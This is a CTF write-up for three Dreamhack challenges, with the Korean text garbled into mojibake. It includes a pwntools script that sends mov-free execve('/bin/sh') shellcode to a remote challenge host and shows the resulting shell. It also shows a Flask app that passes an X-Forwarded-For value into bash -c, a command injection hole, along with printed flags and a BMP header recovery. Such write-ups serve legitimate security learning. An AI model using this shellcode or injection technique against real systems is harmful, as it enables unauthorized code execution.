No mov (pwnable)
Description
์
ธ์ฝ๋ฉ, ์ด์ ๋ ์ต์ํด์ก๊ฒ ์ฃ ?ย mov
๊ฐ ์์ด๋ ์
ธ์ฝ๋ฉํ ์ ์๋์ง ํ ๋ฒ ํ
์คํธํด๋ด
์๋ค.
์ด ๋ฐ์ด๋๋ฆฌ๋ ์ฌ๋ฌ๋ถ์ด ์
๋ ฅํ ์
ธ์ฝ๋์ย mov
์ ํด๋นํ๋ ๋ฐ์ดํธ๊ฐ ์๋์ง ํ์ธํ๊ณ , ์์ผ๋ฉด ์คํ์์ผ์ค๋๋ค.
์ด๋ป๊ฒ๋ ย ./flag
๋ฅผ ์ฝ์ด์๋ณด์ธ์!
solve.py
64bit shellcode
\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05
๊ตฌ๊ธ์ ๊ฒ์ํด๋ณด๋ฉด ๊ณต๊ฐ๋์๋ 23 Bytes Shell Code (๊ธฐ๋ณธ ์์ฝ๋)์์ ์์ ์ ์กฐ๊ธ ํ๋ฉด ๋๋ค.
movabs ๋ช
๋ น์ด ๋์ ์ push, pop, shl, or ์ด์
๋ธ๋ฆฌ ๋ช
๋ น์ด๋ฅผ ์ด์ฉํด์
movabs rbx,0x68732f2f6e69622f ๋ช
๋ น์ด ๋์ฒด๊ฐ ๊ฐ๋ฅํ๋ค.
from pwn import * #context.log_level = 'debug' context(arch='amd64', os='linux') warnings.filterwarnings('ignore') p = process("./main") p = remote("host3.dreamhack.games", 9532) payload = b"\x31\xf6" #xor esi,esi #payload += b"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68" #movabs rbx,0x68732f2f6e69622f payload += b"\x68\x2F\x62\x69\x6E" #push 0x6e69622f '/bin' payload += b"\x68\x2F\x2F\x73\x68" #push 0x68732f2f '//sh' payload += b"\x5B" #pop rbx #rbx=0x68732f2f payload += b"\x48\xC1\xE3\x20" #shl rbx, 32 #rbx=0x68732f2f00000000 (0x6e69622f << 32) payload += b"\x58" #pop rax #rax=0x6e69622f payload += b"\x48\x09\xC3" #or rbx, rax #rbx=0x68732f2f6e69622f (rbx | rax), (0x68732f2f00000000 | 0x6e69622f) payload += b"\x56" #push rsi payload += b"\x53" #push rbx payload += b"\x54" #push rsp payload += b"\x5f" #push rdi payload += b"\x6a\x3b" #push 0x3b payload += b"\x58" #pop eax payload += b"\x31\xd2" #xor edx, edx payload += b"\x0f\x05" #syscall p.sendafter("Give me your shellcode > ", payload) p.interactive()
Result
seo@seo:~/Documents/dreamhack/no_mov$ python3 solve.py [+] Starting local process './main': pid 12373 [+] Opening connection to host3.dreamhack.games on port 9532: Done [*] Switching to interactive mode $ ls flag main $ cat flag DH{1809e85d58743e0c0758ae0795cd0c7092d7adf49d7cbe3d836b1a6a0676fee6} $ [*] Interrupted [*] Closed connection to host3.dreamhack.games port 9532 [*] Stopped process './main' (pid 12373)
FLAG
DH{1809e85d58743e0c0758ae0795cd0c7092d7adf49d7cbe3d836b1a6a0676fee6}
what-is-my-ip (web)
Description
How are they aware of us even behind the wall?
FYI
Flag Location:ย /flag
Flag Format:ย DH{...}
haproxy.cfg
global daemon maxconn 256 defaults mode http timeout connect 50000ms timeout client 50000ms timeout server 50000ms listen http-in bind *:8000 option forwardfor server app app:3000
app.py
#!/usr/bin/python3 import os from subprocess import run, TimeoutExpired from flask import Flask, request, render_template app = Flask(__name__) app.secret_key = os.urandom(64) @app.route('/') def flag(): user_ip = request.access_route[0] if request.access_route else request.remote_addr try: result = run( ["/bin/bash", "-c", f"echo {user_ip}"], capture_output=True, text=True, timeout=3, ) return render_template("ip.html", result=result.stdout) except TimeoutExpired: return render_template("ip.html", result="Timeout!") app.run(host='0.0.0.0', port=3000)
Solution
X-Forwarded-For ํค๋ ์ถ๊ฐ ๋ฐ ๋ช ๋ น์ด ์ฝ์


FLAG
DH{1acfe9db38697eb71538e97e71882f1ad6deb5cb9d8c3448bd05d3adb805e559}
BMP Recovery (misc, forensics)
Description
BMP ํ์ผ์์ ์ด๋ฐ ์ค์ํ ๊ฐ๋ค์ ์ง์๋ฒ๋ฆฌ๋ค๋!
๋นจ๋ฆฌ ๋ณต๊ตฌํด์ ํ๋๊ทธ๋ฅผ ์ฝ์ด์ฃผ์ธ์!
ํ๋๊ทธ ํ์์ DH{...}
๋ก, flag.bmp
๋ฅผ ์ฌ๋ฐ๋ฅด๊ฒ ๋ณต๊ตฌํ๋ฉด ์ฐพ์ ์ ์์ต๋๋ค.
chal.py
with open('flag.bmp', 'rb') as f: data = bytearray(f.read()) data[:0x1C] = b'\x00' * 0x1C data[0x22:0x36] = b'\x00' * 0x14 with open('flag.bmp.broken', 'wb') as f: f.write(data)
get_resolution_posibility.py
def find_multiplication_expression(number): expressions = [] for i in range(1, number+1): if number % i == 0: expressions.append((i, number // i)) return expressions if __name__ == "__main__": biSizeImage = 4769856 multiplication_expressions = find_multiplication_expression(biSizeImage) print(f"{biSizeImage}๋ฅผ ๊ณฑํ ์๋ค:") for expression in multiplication_expressions: print(f"{expression[0]} * {expression[1]}")
C:\Users\Seo Hyun-gyu\Downloads\2a248953-26de-4e3d-b23c-5193d9d2a653>python3 get_resolution_posibility.py 4769856๋ฅผ ๊ณฑํ ์๋ค: 1 * 4769856 2 * 2384928 3 * 1589952 4 * 1192464 6 * 794976 7 * 681408 8 * 596232 9 * 529984 12 * 397488 13 * 366912 14 * 340704 16 * 298116 18 * 264992 21 * 227136 24 * 198744 26 * 183456 28 * 170352 32 * 149058 36 * 132496 39 * 122304 42 * 113568 48 * 99372 49 * 97344 52 * 91728 56 * 85176 63 * 75712 64 * 74529 72 * 66248 78 * 61152 84 * 56784 91 * 52416 96 * 49686 98 * 48672 104 * 45864 112 * 42588 117 * 40768 126 * 37856 144 * 33124 147 * 32448 156 * 30576 168 * 28392 169 * 28224 182 * 26208 192 * 24843 196 * 24336 208 * 22932 224 * 21294 234 * 20384 252 * 18928 273 * 17472 288 * 16562 294 * 16224 312 * 15288 336 * 14196 338 * 14112 364 * 13104 392 * 12168 416 * 11466 441 * 10816 448 * 10647 468 * 10192 504 * 9464 507 * 9408 546 * 8736 576 * 8281 588 * 8112 624 * 7644 637 * 7488 672 * 7098 676 * 7056 728 * 6552 784 * 6084 819 * 5824 832 * 5733 882 * 5408 936 * 5096 1008 * 4732 1014 * 4704 1092 * 4368 1176 * 4056 1183 * 4032 1248 * 3822 1274 * 3744 1344 * 3549 1352 * 3528 1456 * 3276 1521 * 3136 1568 * 3042 1638 * 2912 1764 * 2704 1872 * 2548 1911 * 2496 2016 * 2366 2028 * 2352 2184 * 2184 2352 * 2028 2366 * 2016 2496 * 1911 2548 * 1872 2704 * 1764 2912 * 1638 3042 * 1568 3136 * 1521 3276 * 1456 3528 * 1352 3549 * 1344 3744 * 1274 3822 * 1248 4032 * 1183 4056 * 1176 4368 * 1092 4704 * 1014 4732 * 1008 5096 * 936 5408 * 882 5733 * 832 5824 * 819 6084 * 784 6552 * 728 7056 * 676 7098 * 672 7488 * 637 7644 * 624 8112 * 588 8281 * 576 8736 * 546 9408 * 507 9464 * 504 10192 * 468 10647 * 448 10816 * 441 11466 * 416 12168 * 392 13104 * 364 14112 * 338 14196 * 336 15288 * 312 16224 * 294 16562 * 288 17472 * 273 18928 * 252 20384 * 234 21294 * 224 22932 * 208 24336 * 196 24843 * 192 26208 * 182 28224 * 169 28392 * 168 30576 * 156 32448 * 147 33124 * 144 37856 * 126 40768 * 117 42588 * 112 45864 * 104 48672 * 98 49686 * 96 52416 * 91 56784 * 84 61152 * 78 66248 * 72 74529 * 64 75712 * 63 85176 * 56 91728 * 52 97344 * 49 99372 * 48 113568 * 42 122304 * 39 132496 * 36 149058 * 32 170352 * 28 183456 * 26 198744 * 24 227136 * 21 264992 * 18 298116 * 16 340704 * 14 366912 * 13 397488 * 12 529984 * 9 596232 * 8 681408 * 7 794976 * 6 1192464 * 4 1589952 * 3 2384928 * 2 4769856 * 1
biSizeImage = biWidth * biHeight * 3
14305968 = biWidth * biHeight * 3
4769856 = biWidth * biHeight
๋ชจ๋ ๊ฒฝ์ฐ์ ์๋ฅผ ๋์ดํ์๋,
์ ๋ต์ biWidth = 2548, biHeight=1872์ด์๋ค.
Solution
๋ณต๊ตฌํ bmp ํค๋๋ ๋ค์๊ณผ ๊ฐ๋ค.

flag.bmp
